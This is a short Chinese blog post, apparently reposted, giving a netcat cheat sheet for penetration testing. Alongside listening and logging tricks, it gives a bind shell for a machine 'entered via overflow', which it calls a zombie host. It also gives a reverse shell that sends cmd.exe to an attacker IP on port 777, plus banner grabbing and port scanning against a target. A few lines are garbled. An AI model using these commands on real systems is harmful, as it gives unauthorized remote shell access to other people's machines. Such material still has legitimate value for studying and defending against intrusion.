渗透测试:nc端口转发或反向转发

来源:互联网 发布:中国铁塔 网络强国 编辑:程序博客网 时间:2024/04/26 22:02

我就知道这么些参数 了:

  第一个:

  nc -l -v -p 7626

  这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了.

  如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令:

  nc -l -p 80 >>c://日志.dat

  这样,凡是有针对本机80端口的攻击都会被记录下来的.

  二、

  如果你通过溢出进入了别人的机器,就可以运行:

  nc -l -p 123 -e cmd.exe

  或者是: nc -l -p 123 -t

  作用都是以cmd.exe来响应到机器上123端口的连接.

  这样就把溢出的主机变成了一台telnet肉鸡了!

  你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 .

  在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777

  再在本地机器上运行: nc -l -p 777

  意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。

  你再在本地机上监听777端口,这样就进入了对方的cmd了。

  这也微十时毫 反弹端口式木马的原理了。

  三、

  用这个命令:

  nc -v 192.168.0.25 80

  就获得了192.168.0.25的80端口的信息。

  可以获得IIS版本等很多重要信息 的 。

  四、

  你也可以将NC作为扫描器使用:

  nc -v -z 192.168.0.25 1-100

  扫描192.168.0.25的1到100间的TCP端口

  用nc -v -z -u 192.168.0.25 1-100

  这是扫描1到00间的UDP端口。

0 0
原创粉丝点击